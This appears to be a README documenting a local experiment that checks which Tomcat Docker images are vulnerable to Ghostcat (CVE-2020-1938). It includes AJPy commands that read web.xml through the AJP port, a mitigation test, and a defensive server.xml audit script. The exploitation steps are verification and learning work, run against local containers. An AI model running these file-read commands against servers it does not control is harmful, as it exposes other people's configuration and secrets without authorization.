A new vulnerability called Ghostcat (CVE-2020-1938) has been found; see the articles on Snyk and Tenable for details and analysis of the exploit itself.
In my case, I wanted to verify which Tomcat servers are exploitable and, if so, how the exploit manifests itself. This experiment checks Tomcat 7, 8 and 9.
Prerequisites:
- docker
- python
- git
TODO: How to verify a Tomcat 7 is vulnerable?
Rather than testing exploits on live servers, I am using existing Docker images of Tomcat for my experiment, together with AJPy, which crafts AJP requests in order to communicate with AJP connectors.
Start Tomcat 8.5.32 with both the HTTP (8080) and AJP (8009) ports published, then ask AJPy to read the manager webapp's web.xml through the AJP connector:
```shell
git clone --recurse-submodules git@github.com:shaunmclernon/ghostcat-verification.git
cd ghostcat-verification/AJPy
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```
If the contents of web.xml are returned, this version of Tomcat is vulnerable.
If we run the same test against the latest Tomcat 8.5 image, we can see it is not vulnerable to this particular issue.
```shell
docker run --name tomcat --rm -d -p 8080:8080 -p 8009:8009 tomcat:8.5
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```
In this case we should get a Python traceback instead of the file contents, which here means the server is not vulnerable:
```text
Traceback (most recent call last):
File "tomcat.py", line 377, in <module>
hdrs, data = bf.perform_request("/" + args.webapp + "/xxxxx.jsp", attributes=attributes)
...
...
struct.error: unpack requires a buffer of 5 bytes
```
TODO: How to verify a Tomcat 9 is vulnerable?
TODO: How to verify a Spring Boot service is vulnerable?
Obviously, if a server is vulnerable (regardless of version), you should consider upgrading to a patched version. Another option is to block access to the AJP port.
Start the same vulnerable Tomcat version, but do not publish the AJP port 8009:
```shell
docker run --name tomcat --rm -d -p 8080:8080 tomcat:8.5.32
python tomcat.py read_file --webapp=manager /WEB-INF/web.xml 127.0.0.1
docker stop tomcat
```
In this case the read attempt fails, because the AJP connector cannot be reached from outside the container.
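Since the mitigation is to keep the AJP connector unreachable, a defender-side check that reads Tomcat's server.xml and flags AJP connectors that listen beyond loopback or accept requests without a shared secret is useful. This is an added example, not part of this repo or of AJPy; the two server.xml fragments are constructed for illustration, and a missing `address` or `secretRequired` attribute is assumed to mean the unpatched defaults (all interfaces, no secret).

```python
import xml.etree.ElementTree as ET
from typing import List

# Constructed server.xml fragments for illustration only. The first mirrors the
# pre-fix Tomcat default (AJP on all interfaces, no secret); the second is hardened.
DEFAULT_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""

HARDENED_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="REPLACE_WITH_A_RANDOM_SECRET"/>
  </Service>
</Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost", "0:0:0:0:0:0:0:1"}


def audit_ajp_connectors(server_xml: str) -> List[str]:
    """Return one finding per AJP connector that is reachable from a non-loopback
    address or that does not require a shared secret. Missing attributes are
    treated as the unpatched defaults (assumption: all interfaces, no secret),
    which is the conservative reading for Tomcat builds from before the fix."""
    findings = []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        protocol = conn.get("protocol", "HTTP/1.1")
        if "ajp" not in protocol.lower():
            continue  # HTTP connectors are not affected by CVE-2020-1938
        port = conn.get("port", "?")
        address = conn.get("address", "0.0.0.0")
        secret_required = conn.get("secretRequired", "false").lower() == "true"
        if address not in LOOPBACK:
            findings.append(
                f"AJP connector on port {port} listens on {address}: "
                "bind it to 127.0.0.1, firewall it, or remove the connector")
        if not (secret_required and conn.get("secret")):
            findings.append(
                f"AJP connector on port {port} requires no shared secret: "
                "set secretRequired=\"true\" and a strong secret")
    return findings


if __name__ == "__main__":
    for label, xml in (("default", DEFAULT_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(label, audit_ajp_connectors(xml) or ["no AJP exposure found"])
```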
I am not a security professional and this repo was built for my own learning purposes; it is not intended to be used for malicious purposes.